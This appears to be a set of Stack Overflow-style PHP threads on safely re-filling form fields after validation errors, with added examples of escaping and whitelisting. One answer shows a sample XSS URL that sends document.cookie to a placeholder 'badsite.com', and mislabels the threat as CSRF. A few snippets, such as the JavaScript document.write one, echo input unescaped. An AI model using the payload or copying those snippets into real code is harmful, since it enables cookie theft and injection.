How can I re-fill posted form data via PHP in the event of an error? I have a contact form and the user enters a bunch of information, and if one field doesn't validate, he loses everything. How can I stop this from happening and make sure it is secure?
I've tried this, but believe I read somewhere it is not secure:
<input type="text" name="name" value="<?php echo $_POST['name']; ?>" />
One issue is that if $_POST['name'] contains a ", then the value can 'escape' out and rewrite the page content.
Another is that with strict error checking switched on, accessing a non-existent array index will throw a Notice error.
Here is one safe way of re-filling the form data:
<input type="text" name="name" value="<?php echo isset($_POST['name']) ? htmlspecialchars($_POST['name']) : ''; ?>" />
I would personally recommend handling form display and validation through a framework, like Zend_Form within the Zend Framework. (You won't have to switch everything else over just to use the form stuff.) It makes writing safe and readable code much easier.
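As an added example (not code from the answer above, nor from Zend_Form), here is a small helper that covers both points just raised, the Notice on a missing index and a quote breaking out of the attribute, and also the case where the browser posts an array under a name the template treats as a scalar. The `$_POST` array below is constructed to stand in for a real submission.

```php
<?php
// Added example: a helper for re-filling POST values safely.
// Assumes the form fields are plain scalar text inputs.

/**
 * Return the submitted value for $field, escaped for use inside a
 * double- or single-quoted HTML attribute, or $default when nothing
 * usable was posted.
 */
function old($field, $default = '')
{
    // Missing index: avoid the Notice and fall back to the default.
    if (!isset($_POST[$field])) {
        return htmlspecialchars($default, ENT_QUOTES, 'UTF-8');
    }
    $value = $_POST[$field];
    // name[]=... arrives as an array; a scalar field must not echo "Array".
    if (!is_string($value)) {
        return htmlspecialchars($default, ENT_QUOTES, 'UTF-8');
    }
    // ENT_QUOTES also converts single quotes, so the result is safe in
    // value='...' attributes as well as value="..." ones.
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Constructed sample submission standing in for a real POST request.
$_POST = array(
    'name'  => 'O\'Neil" <b>',   // both quote styles plus a tag
    'email' => array('x'),       // an array where a string was expected
);

printf('<input type="text" name="name" value="%s" />%s', old('name'), PHP_EOL);
printf('<input type="text" name="email" value="%s" />%s', old('email'), PHP_EOL);
printf('<input type="text" name="phone" value="%s" />%s', old('phone', 'n/a'), PHP_EOL);
```

The first input renders as `value="O&#039;Neil&quot; &lt;b&gt;"`, so the quote can no longer close the attribute and the tag is shown as text; the second falls back to the empty default instead of printing `Array`; the third uses the supplied default with no Notice.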
I have a form in PHP and I have common fields such as 'Name' and 'Surname'.
Now when the user visits the page e.g. http://www.example.com/form.php the form fields 'Name' and 'Surname' are empty.
I would like to now have a link similar to this http://www.example.com/form.php?name=John
so that when the client hits the link the PHP form will now have the name field already filled with 'John' in it.
I know this can be done in HTML but how can I do it in PHP?
Just to let you know, I do not own the PHP form - I just want a link from my website to fill the PHP form (which I do not have control over).
Thanks in advance.
Can be done using $_GET
An associative array of variables passed to the current script via the URL parameters.
e.g.:
<?php
if (isset($_GET['name'])) {
    $test = $_GET['name'];
}
?>
<html>
<body>
<form>
<input type="text" name="test" value="<?php if (isset($test)) { echo htmlspecialchars($test); } ?>"/>
</form>
</body>
</html>
Note: code isn't tested or anything.. Also, there are possible security risks with getting values from your URL (can be considered user input), so make sure you are aware of that and how to prevent
You could store that value and then when you're about to output the input fields
you just pass along the stored value.
$name = isset($_GET['name']) ? $_GET['name'] : '';
// ... later on
echo '<input type="text" value="'.htmlspecialchars($name).'"/>';
By using $_GET superglobal
<input name="name" value="<?php echo !empty($_GET['name']) ? htmlspecialchars($_GET['name']) : '';?>" />
<input name="surname" value="<?php echo !empty($_GET['surname']) ? htmlspecialchars($_GET['surname']) : '';?>" />
You can use the get method in PHP to get the name and make use of it.
You can retrieve this information by the $_GET["name"] function, or $_REQUEST["name"].
Reserved variables
Be careful with those operations, you might have validation and/or security problems.
Note: if you are not sure whether the "name" variable is set or not, you also have to use the
isset function to test it.
You can use the $_GET superglobal, so your input could look like this:
<input type="text" name="name" value="<?php if (isset($_GET['name'])) { echo htmlspecialchars($_GET['name']); } ?>" />
The $_REQUEST superglobal does a similar thing but I would just use $_GET.
It looks like everyone's answers here assume you are building the form yourself, which doesn't appear to be the case based on your question.
The thing that you want to do may or may not be possible. If the form accepts certain kinds of parameters in certain ways, you may be able to hook in to that functionality and set it up so that when someone clicks a link on your page, that information gets passed to the other page.
One way forms can accept this information is in the form of a "get" request. With this method, values are passed as part of the url, as in your example: http://www.example.com/form.php?name=John. Assuming your page has access to a php variable called $name, you can create a link from your code to build this kind of url like this:
Sign up!
If the page does not accept get parameters in this way (and I have a hard time imagining that they would), you may have to try other techniques to send along the information (assuming that they will even accept it!). The two other ways I imagine you could do this are by passing the value with "post" or creating a cookie for the page. If you tell us what page you are trying to set up this behavior on, we might be able to examine it and give you a better answer.
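As an added example (not code from the question or any answer above), this shows both halves of the "get" approach just described: building the link on your own site so that the value is URL-encoded and safe inside an `href`, and reading it back on the receiving page without a Notice or an attribute break-out. The target URL and the field names are the placeholders from the question; the visitor name is constructed.

```php
<?php
// Added example: pre-fill link construction plus the receiving side.

/**
 * Build a link to $baseUrl whose query string carries $params, ready to be
 * placed in the page as an <a> element.
 */
function prefill_link($baseUrl, array $params, $label)
{
    // http_build_query() percent-encodes spaces, '&', quotes etc., so a
    // value cannot break the query string or add extra parameters.
    $url = $baseUrl . '?' . http_build_query($params);
    // The URL then sits inside an HTML attribute, so escape it for that
    // context too ('&' becomes '&amp;', which browsers decode again).
    return sprintf('<a href="%s">%s</a>',
        htmlspecialchars($url, ENT_QUOTES, 'UTF-8'),
        htmlspecialchars($label, ENT_QUOTES, 'UTF-8'));
}

/**
 * Receiving page: return a scalar query parameter escaped for a
 * value="..." attribute, or '' when it is absent or not a string.
 */
function query_value($field)
{
    if (!isset($_GET[$field]) || !is_string($_GET[$field])) {
        return '';
    }
    return htmlspecialchars($_GET[$field], ENT_QUOTES, 'UTF-8');
}

// Linking page: a constructed visitor name with characters that need encoding.
$params = array('name' => 'John "Jack" O\'Brien & Sons', 'surname' => 'Smith');
echo prefill_link('http://www.example.com/form.php', $params, 'Sign up!'), PHP_EOL;

// Receiving page: simulate the query string that link produces by parsing
// it into $_GET, the same way PHP does for a real request.
parse_str(http_build_query($params), $_GET);
printf('<input type="text" name="name" value="%s" />%s', query_value('name'), PHP_EOL);
printf('<input type="text" name="surname" value="%s" />%s', query_value('surname'), PHP_EOL);
```

Note the two different encodings: `http_build_query()` protects the URL (`&` in the name becomes `%26`, so it is not read as a parameter separator), while `htmlspecialchars()` protects the HTML attributes on both pages.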
Ok, so this is a common scenario.
You have an html form that involves editing information. The original information comes from the database. When you post the form, it may not save the information immediately, because something may need fixing when the data-checking is done, maybe one of the required fields is left blank. As a result, you want to redisplay the form field, but if there was post data, display the post data, if not, display the original data from the database.
So I created a function to check post, then default to some arbitrary data (in this case from the database).
But overall, the approach feels inelegant, the POST data is being pulled invisibly inside the function from a global, but if I pass the post data in I have to pass it in for every function call, and it's almost as verbose as just doing it by hand each time, so specifically I'm looking for alternatives to this approach, and generally I'd love advice on better ways to deal with this form scenario that I deal with every single time I edit html forms.
<?php
// Pull from post or get, or else use data, e.g. from the database, to populate a form.
function in_or_data($index, $data, $trim=false){
    // !empty() avoids a Notice when the field was not posted at all.
    return !empty($_POST[$index]) ? ($trim ? trim($_POST[$index]) : $_POST[$index]) : $data[$index];
}

$item_name = in_or_data('item_name', $data_from_database_somewhere); // Pull post data, with defaults coming from the
?>
<!-- ..... Later, some example html that just escapes & echoes out the data. ..... -->
<td id='item-name'><input name="item_name" type="text" id="item_name" value="<?php echo escape($item_name); ?>" size="47" maxlength="100" tabindex="9"></td>
How can I improve dealing with forms that get their data either from the database initially, or from post after some kind of submission is being done?
<input type="text" name="abc" value="<?php echo array_key_exists('abc', $_REQUEST) ? htmlspecialchars($_REQUEST['abc']) : "default value goes here"; ?>" />
A more elegant solution, though a serious amount of work, would involve using ajax (jquery, etc.) to perform server-side validation on the form BEFORE actually submitting.
What you are doing seems fine to me. Basically what I do in the same situation is have a hidden field in the form something like
<input name="is_edit" ... />
and in my PHP just check for $_POST['is_edit'] so that I don't populate anything from the database. One problem with doing every field individually like you are doing it above is that for certain things (for example checkboxes) if the user doesn't check the checkbox, $_POST['checkbox_data'] is not going to be set, so I believe you would end up pulling that from the database using the function you have above. It should be either all or nothing that is pulled by the DB. I therefore do something like this:
<?php
if (isset($_POST['is_edit'])) {
    $var1 = $_POST['var1'];
    $var2 = $_POST['var2'];
    // etc
}
else {
    $data = do_db_query_and_get_data();
    $var1 = $data['var1'];
    $var2 = $data['var2'];
    // etc
}
?>
<input type="something" value="<?php echo htmlspecialchars($var1); ?>" />
<input type="something" value="<?php echo htmlspecialchars($var2); ?>" />
<input type="hidden" name="is_edit" value="1" />
Doing it like this also has the other advantage of not having to do the database query unless it is necessary.
In addition to my initial php code, I have started using the html5 attributes like required and setting the html5 form types like number, email, etc. It has really really made my forms much better for browsers that support html5 form aspects, and it degrades to standard text boxes and ignores the required attribute in browsers that don't support html5 form stuff.
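As an added example (not code from the question or the answers above), the all-or-nothing idea is carried through for a whole form, including the checkbox case mentioned above: once `is_edit` is present, an absent checkbox means "unchecked" and must not fall back to the database value. The field list, the database row and the two sample submissions are constructed.

```php
<?php
// Added example: decide once per form whether values come from POST or
// from the stored record, then render every field from that one array.

/**
 * $fields maps each form field to its type ('text' or 'checkbox').
 * Returns one array of values ready for the template.
 */
function form_values(array $fields, array $post, array $record)
{
    $submitted = isset($post['is_edit']);
    $values = array();
    foreach ($fields as $name => $type) {
        if (!$submitted) {
            // First display: everything comes from the stored record.
            $values[$name] = isset($record[$name]) ? $record[$name] : '';
            continue;
        }
        if ($type === 'checkbox') {
            // An unchecked box is simply absent from POST; that means
            // "unchecked", not "fall back to the database".
            $values[$name] = isset($post[$name]) ? 1 : 0;
        } else {
            $values[$name] = (isset($post[$name]) && is_string($post[$name]))
                ? trim($post[$name]) : '';
        }
    }
    return $values;
}

// Escape a value for use inside an HTML attribute.
function attr($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

$fields = array('item_name' => 'text', 'on_sale' => 'checkbox');
$record = array('item_name' => 'Widget', 'on_sale' => 1);   // constructed DB row

// Scenario 1: first display, nothing posted yet -> Widget, box checked.
$first = form_values($fields, array(), $record);
// Scenario 2: the user renamed the item and cleared the checkbox, and
// validation failed -> Gadget "X", box unchecked (not re-checked from the DB).
$resubmit = form_values($fields, array('is_edit' => '1', 'item_name' => ' Gadget "X" '), $record);

foreach (array($first, $resubmit) as $values) {
    printf('<input name="item_name" type="text" value="%s" />%s', attr($values['item_name']), PHP_EOL);
    printf('<input name="on_sale" type="checkbox" value="1"%s />%s',
        $values['on_sale'] ? ' checked="checked"' : '', PHP_EOL);
    echo '<input type="hidden" name="is_edit" value="1" />', PHP_EOL;
}
```

Keeping the decision in one place also means the database query runs only on the first display, as the answer above points out, and the template never touches `$_POST` directly.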
I want to prepopulate a form with variables from a url. How do I do this?
For example:
http://somewhere.com?name=john
Then the name field in a form would be prepopulated with "John", and if there was no name in the URL then the field would be empty and ready to be filled in.
Thanks in advance..
Well, using php, something like
<input type="text" name="name" value="<?php echo ((isset($_GET["name"]))?htmlspecialchars($_GET["name"]):""); ?>" />
I'm not sure how to parse out the get variables using javascript..
Also, remember to add the htmlspecialchars, to thwart csrf attacks.
If someone ran something like: http://example.com/form.php?name="><script>document.location.href = "http://badsite.com?cookies="+document.cookie;</script><class id="
Could turn out badly (just an example, not sure if it works).
The PHP way:
<input type="text" name="name" value="<?php echo isset($_GET["name"]) ? htmlspecialchars($_GET["name"]) : ''; ?>"/>
For javascript, you should first find a way to retrieve GET variables. Have a look at this: How to get "GET" request parameters in JavaScript?
After you include the function proposed in the answer, you can do the following:
document.write('<input type="text" name="name" value="'
+ get('name')
+ '"/>');
You use the PHP $_GET['name'] value as the value of the form element. If there is no value set, the value will appear blank, which is what you want.
<input type="text" name="name" value="<?php echo isset($_GET['name']) ? htmlspecialchars($_GET['name']) : ''; ?>" />
Server side is the best way to go (PHP or whatever language you're coding in). It avoids client-side performance issues and is generally more reliable overall.
If you needed to use JavaScript though, you could do so with the help of this jQuery plugin (or look at the source to see what / how it gets the GET params from the current window.location.)
http://www.mathias-bank.de/2007/04/21/jquery-plugin-geturlparam-version-2/
Then use the $('input').val() function to set the value.
I'm new to code igniter. I'm following the form validation tutorial found at:
http://www.codeignitor.com/user_guide/libraries/validation.html
I find I am typing too much in the view to get the form to re-populate. For example, here's what one of my INPUT fields look like:
<input type="text" name="email" value="<?=$this->validation->email ? $this->validation->email : $array_db_values['email'] ?>" />
Basically, when the form first loads, it should show a value from the database. If the user alters the value and it fails validation, then the form should post the erroneously submitted value.
Does code igniter have a "cleaner" way of rendering this kind of output? Otherwise, I'm going to do something like this in my controller:
$array_db_values = getdbresults();
if (isset($_POST['submit']))
    foreach ($_POST as $key => $val)
        $array_db_values[$key] = $val;
That way, if postback data exists, it will always override database values.
Then input fields in my view can simply be:
<input type="text" name="email" value="<?=$array_db_values['email'] ?>" />
Is there a better/native CI way to handle this scenario?
I don't think an easier way exists; the best way IMO is to do something like this in your controller:
if (isset($_POST['submit']))
{
    $values = $_POST;
}
else
{
    $values = getdbresults();
}
No need to loop through the $_POST array; in short:
$values = (isset($_POST['submit'])) ? $_POST : getdbresults();
In your view, you do the same:
<input type="text" name="email" value="<?=htmlspecialchars($values['email']) ?>" />
Or use the Form helper:
echo form_input('email', $values['email']);
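As an added example (not code from the question or the answer above, and not part of CodeIgniter), here is the same "POST overrides the database row" idea with one refinement: taking `$_POST` wholesale lets a request set any key at all, so the merge is limited to the fields the form actually offers. `getdbresults()` is stood in for by a constructed array, and the resubmission is constructed too.

```php
<?php
// Added example: merge submitted values over the stored row, keeping only
// whitelisted fields.

/**
 * Start from the stored row, then let POST override only the fields in
 * $allowed. Any other posted key is ignored.
 */
function merged_values(array $dbRow, array $post, array $allowed)
{
    // Drop every key of $post that is not an allowed form field.
    $editable = array_intersect_key($post, array_flip($allowed));
    // Plain input fields carry strings; anything else is not accepted.
    $editable = array_filter($editable, 'is_string');
    return array_merge($dbRow, $editable);
}

$allowed = array('email', 'name');
$dbRow   = array('id' => 42, 'email' => 'old@example.com', 'name' => 'Ann');

// Constructed resubmission after a failed validation: the user changed the
// email; the request also carries an 'id' key the form never offered.
$post = array('submit' => 'Save', 'email' => 'new@example.com', 'id' => '7');

$values = isset($post['submit']) ? merged_values($dbRow, $post, $allowed) : $dbRow;

printf('<input type="text" name="email" value="%s" />%s',
    htmlspecialchars($values['email'], ENT_QUOTES, 'UTF-8'), PHP_EOL);
printf('<input type="text" name="name" value="%s" />%s',
    htmlspecialchars($values['name'], ENT_QUOTES, 'UTF-8'), PHP_EOL);
// $values['id'] is still 42: the posted '7' was filtered out before the merge.
```

The view stays as short as in the answer above, since it only ever reads `$values`; the whitelist lives in the controller next to the query that produced the row.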
Have you guys looked into the Datamapper Overzealous project?
http://www.overzealous.com/dmz/
It handles validation at the model level. In your form fields, you can set the value to come from the model (either from the database or from your previous post).
<input type='text' name='email' value='<?=$object->data_item ?>' />
I'm pretty new to CodeIgniter as well, but adding this library has made things much easier. That project also comes with a form extension that could really make things easier, but I haven't played much with it yet.
I'm doing exactly the same as what you are doing. It's a bit cumbersome but not too bad IMHO.
I felt the same way about laboring over forms, check out macigniter's Form Lib in the Ignited Code forums. It saves a ton of time and is really well-written.
I have a picture upload inside a form...
The file is a php file btw...
Problem is whenever this form is filled in, and the user clicks to upload the first picture, the form is submitted to itself and all the fields which the user may have filled in will go blank...
I know of one way to do it, a lot of 'isset' in my PHP code, but is there any simpler or maybe better way I don't know of?
Thanks
You echo back the POST variable on your fields.
<form method="POST">
<input type="text" name="name" value="<?php echo isset($_POST['name']) ? htmlspecialchars($_POST['name']) : ''; ?>" />
<input type="submit" name="submit" />
</form>
When the form is submitted to self, the same data will be filled.
Well, I do not know of anything else. I always use this:
<input type="text" value="<?= isset($value) ? htmlspecialchars($value) : ""; ?>">
I think it is not too much code in the templates, but it does the trick.
Alternatively you could use some frameworks which abstract everything for you, but I cannot recommend any...